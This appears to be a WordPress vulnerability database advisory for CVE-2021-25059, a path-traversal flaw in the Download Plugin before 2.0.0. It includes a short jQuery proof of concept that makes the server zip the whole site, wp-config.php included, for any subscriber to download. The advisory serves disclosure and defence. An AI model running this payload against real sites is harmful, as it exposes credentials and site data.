Download Plugin < 2.0.0 – Subscriber+ Website Download | CVE 2021-25059 | Plugin Vulnerabilities

Description

The plugins does not properly validate a user has the required privileges to access a backup's nonce identifier, which may allow any users with an account on the site (such as subscriber) to download a full copy of the website.

Proof of Concept

PoC:
jQuery.post(ajaxurl,{
action:"dpwap_plugin_download_url",
pluginData:"..\\..\\..\\wordpress"
})

Warning: this will make a zip of the whole installation and takes a few minutes.

The result is available at https://example.com/wordpress.zip and the zip file contains all files under the installation directory including wp-config.php.

Affects Plugins

download-plugin

Fixed in 2.0.0

References

CVE

Classification

Type

TRAVERSAL

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

apple502j

Submitter

apple502j

Verified

Yes

WPVDB ID

b125a765-a6b6-421b-bd8a-effec12bc629

Timeline

Publicly Published

2021-11-11 (about 4 years ago)

Added

2022-11-02 (about 3 years ago)

Last Updated

2022-11-02 (about 3 years ago)

Other

Published

Title

Published

2023-05-23

Title

WordPress File Upload < 4.19.2 - Admin+ Path Traversal

Published

2022-10-28

Title

Ultimate Member < 2.5.1 - Admin+ LFI via Traversal

Published

2019-05-23

Title

Simple File List Plugin < 3.2.8 - Unauthenticated Arbitrary File Download

Published

2022-07-27

Title

WordPress Team Members Showcase < 4.1.2 - Subscriber+ Arbitrary File Read and Deletion

Published

2024-06-24

Title

WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block